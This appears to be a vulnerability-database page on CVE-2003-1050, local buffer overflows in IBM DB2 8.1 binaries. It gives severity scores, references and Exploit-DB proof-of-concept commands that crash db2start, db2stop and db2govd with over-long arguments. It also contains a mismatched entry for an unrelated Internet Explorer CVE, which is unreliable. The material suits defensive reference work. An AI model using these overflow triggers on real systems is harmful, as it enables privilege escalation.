CVE-2003-1050
Published 2004-09-28
Priority: P4 26 · Severity: high · CVSS 2.0: 7.2
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.39% (68.9th percentile)
Multiple buffer overflows in IBM DB2 Universal Database 8.1 may allow local users to execute arbitrary code via long command line arguments to (1) db2start, (2) db2stop, or (3) db2govd.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow
exploitdb·2004-11-02
CVE-2004-1050 Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow
---
BoF PoC exploit
Copyright (C) 2003, 2004 by Berend-Jan Wever.
http://www.edup.tudelft.nl/~bjwever
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston,
Exploit-DB
IBM DB2 - 'db2stop' Command Line Argument Local Overflow
exploitdb·2003-11-07
CVE-2003-1050 IBM DB2 - 'db2stop' Command Line Argument Local Overflow
---
source: https://www.securityfocus.com/bid/8990/info
IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities in binaries that are shipped with DB2. The vulnerabilities are likely caused by a lack of sufficient boundary checks on user-supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables, a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges.
[kf@RiotStarter adm]$ ./db2stop `perl -e 'print "A" x 4001'`
Segmentation fault
Exploit-DB
IBM DB2 - 'db2govd' Command Line Argument Local Overflow
exploitdb·2003-11-07
CVE-2003-1050 IBM DB2 - 'db2govd' Command Line Argument Local Overflow
---
source: https://www.securityfocus.com/bid/8990/info
[db2inst1@RiotStarter adm]$ ./db2govd stop a `perl -e 'print "A" x 65'`
Segmentation fault
Exploit-DB
IBM DB2 - 'db2start' Command Line Argument Local Overflow
exploitdb·2003-11-07
CVE-2003-1050 IBM DB2 - 'db2start' Command Line Argument Local Overflow
---
source: https://www.securityfocus.com/bid/8990/info
[kf@RiotStarter adm]$ source /home/db2inst1/sqllib/db2profile
[kf@RiotStarter adm]$ ./db2start `perl -e 'print "A" x 9901'`
S
No writeups or analysis indexed.
http://www.secnetops.com/research/advisories/SRT2003-11-06-0710.txt
http://www.securityfocus.com/archive/1/343804
http://www.securityfocus.com/bid/8990
https://exchange.xforce.ibmcloud.com/vulnerabilities/13633